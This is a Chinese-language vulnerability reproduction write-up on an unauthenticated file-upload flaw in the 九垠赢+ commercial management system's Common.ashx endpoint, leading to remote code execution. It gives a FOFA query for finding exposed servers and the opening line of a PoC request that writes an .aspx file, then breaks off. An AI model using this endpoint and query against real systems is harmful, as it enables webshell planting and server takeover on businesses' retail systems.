九垠赢+商业管理系统 Common.ashx 文件上传致RCE漏洞复现

0x01 产品简介

九垠赢+商业管理系统是基于互联网技术的进销存管理软件，适用于新零售背景下各种业态的线上线下一体化的商超经营管理。赢+ERP以商业管理系统为底座，融合了多种软、硬件解决方案，实现了从企业、供应商、三方平台到顾客等日常管理的全线数字化、智能化和移动化，是一套庞大的全场景、全链路、全渠道管理中台系统。同时，融合了先进的经营理念，借助系统对企业业务流程进行科学的设计和优化，使企业管理逐步进入规范、高效的运行轨道，从根本上降低企业运营成本，提高企业经营效益。

0x02 漏洞概述

九垠赢+商业管理系统 Common.ashx 存在文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。

0x03 复现环境

FOFA：

body="九垠赢+"

0x04 漏洞复现

PoC

POST /System/Common.ashx?type=savefile&path=rce.aspx H